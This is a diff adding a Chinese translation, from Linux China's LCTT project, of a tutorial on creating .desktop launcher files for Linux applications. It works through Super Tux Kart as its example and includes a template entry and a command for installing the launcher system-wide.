@ -0,0 +1,89 @@
|
||||
为你的 Linux 应用创建 .Desktop 文件
|
||||
======
|
||||
在 Linux 中,一个 .desktop 文件就是一个用来运行程序的快捷方式。没有 .desktop 文件的话,你的应用就不会在应用菜单中显示了,也无法使用像 Synapse 和 Albert 这样的第三方启动器启动了。
|
||||
|
||||
大多数应用在安装后都会自动创建 .desktop 文件,并将自己放入应用菜单中以方便访问。然而,如果是你自己从源代码中编译的程序或者自己下载的压缩格式的应用,那就不会做这些事情了,每次你都需要打开终端来执行它的二进制文件。显然这个过程很无聊也很麻烦。
|
||||
|
||||
本文将会告诉你如何为应用创建 .desktop 文件,从而让你能在应用菜单中启动该应用。
|
||||
|
||||
**相关阅读**:[How to Add App Drawers to Unity Launcher in Ubuntu][1]
|
||||
|
||||
### 如何创建桌面启动器
|
||||
".desktop" 文件基本上就是一个包含程序信息的纯文本文件,通常根据是自己可见还是所有用户可见的不同而放在 "~/.local/share/applications" 或者 "/usr/share/applications/" 目录中。你在文件管理器中访问这两个目录,都会看到很多系统中已安装应用对应的 ".desktop" 文件存在。
|
||||
|
||||
为了演示,我将会为 Super Tux Kart 创建一个 .desktop 文件,这是一个我很喜欢玩的卡丁车竞赛游戏。Ubuntu 仓库中带了这个游戏,但版本一般不新。
|
||||
|
||||
要获得最新的版本就需要下载 tar 包,解压并执行其中的游戏启动文件。
|
||||
|
||||
你可以仿照这个步骤来为任何程序创建启动器。
|
||||
|
||||
**注意**:下面步骤假设程序压缩包放在 "Downloads" 目录下。
|
||||
|
||||
1。跳转到存放压缩包的目录,右击然后选择 "Extract here"。
|
||||
|
||||
![application-launcher-5][2]
|
||||
|
||||
2。解压后,进入新创建的目录然后找到可执行的文件。之后右击文件选择 "Run" 来启动程序,确定程序运行正常。
|
||||
|
||||
![application-launcher-6][3]
|
||||
|
||||
3。有时候,你在右键菜单中找不到 "Run" 选项。这通常是因为这个可执行文件是一个文本文件。你可以在终端中执行它,如果你使用 GNOME 的话,可以点击上面菜单栏中的 Files 菜单,然后选择 "Preferences"。
|
||||
|
||||
![application-launcher-linux-1][4]
|
||||
|
||||
4。选择 "Behavior" 标签页然后选择 "Executable Text Files" 下的 "Run them"。现在右击可执行文本文件后也能出现 "Run" 选项了。
|
||||
|
||||
![application-launcher-31][5]
|
||||
|
||||
5。确认应用运行正常后,就可以退出它了。然后运行你的文本编辑器并将下面内容粘贴到空文本文件中:
|
||||
```
|
||||
[Desktop Entry]
|
||||
Encoding=UTF-8
|
||||
Version=1.0
|
||||
Type=Application
|
||||
Terminal=false
|
||||
Exec=/path/to/executable
|
||||
Name=Name of Application
|
||||
Icon=/path/to/icon
|
||||
```
|
||||
|
||||
你需要更改 "Exec" 域的值为可执行文件的路径并且将 "Name" 域的值改成应用的名称。大多数的程序都在压缩包中提供了一个图标,不要忘记把它也填上哦。在我们这个例子中,Super Tux Kart 的启动文件看起来是这样的:
|
||||
|
||||
![application-launcher-supertuxkart][6]
|
||||
|
||||
6。将文件以 "application-name.desktop" 为名保存到 "~/.local/share/applications" 目录中。".local" 目录位于你的 Home 目录下,是一个隐藏目录,你需要启用 "Show Hidden Files" 模式才能看到它。如果你希望这个应用所有人都能访问,则在终端中运行下面命令:
|
||||
```
|
||||
sudo mv ~/.local/share/applications/<application-name.desktop> /usr/share/applications/
|
||||
```
|
||||
|
||||
当然,别忘了把命令中的 <application-name.desktop> 改成真实的 .desktop 文件名。
|
||||
|
||||
7。完成后,打开应用菜单,就能看到应用出现在其中,可以使用了。
|
||||
|
||||
![application-launcher-2][7]
|
||||
|
||||
这个方法应该适用于所有主流的 Linux 操作系统。下面是另一张 Super Tux Kart 在 elementary OS 的应用启动器 (slingshot) 上的截图
|
||||
|
||||
![application-launcher-4][8]
|
||||
|
||||
如果你觉得本教程还有点用的话,欢迎留言。
|
||||
|
||||
--------------------------------------------------------------------------------
|
||||
|
||||
via: https://www.maketecheasier.com/create-desktop-file-linux/
|
||||
|
||||
作者:[Ayo Isaiah][a]
|
||||
译者:[lujun9972](https://github.com/lujun9972)
|
||||
校对:[校对者ID](https://github.com/校对者ID)
|
||||
|
||||
本文由 [LCTT](https://github.com/LCTT/TranslateProject) 原创编译,[Linux中国](https://linux.cn/) 荣誉推出
|
||||
|
||||
[a]:https://www.maketecheasier.com/author/ayoisaiah/
|
||||
[1]:https://www.maketecheasier.com/add-app-drawer-unity-launcher-ubuntu/ (How to Add App Drawers to Unity Launcher in Ubuntu)
|
||||
[2]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-5.png (application-launcher-5)
|
||||
[3]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-6.png (application-launcher-6)
|
||||
[4]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-linux-1.png (application-launcher-linux-1)
|
||||
[5]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-31.png (application-launcher-31)
|
||||
[6]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-supertuxkart.png (application-launcher-supertuxkart)
|
||||
[7]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-2.jpg (application-launcher-2)
|
||||
[8]:https://www.maketecheasier.com/assets/uploads/2017/11/application-launcher-4.jpg (application-launcher-4)
|
Loading…
Reference in New Issue
Block a user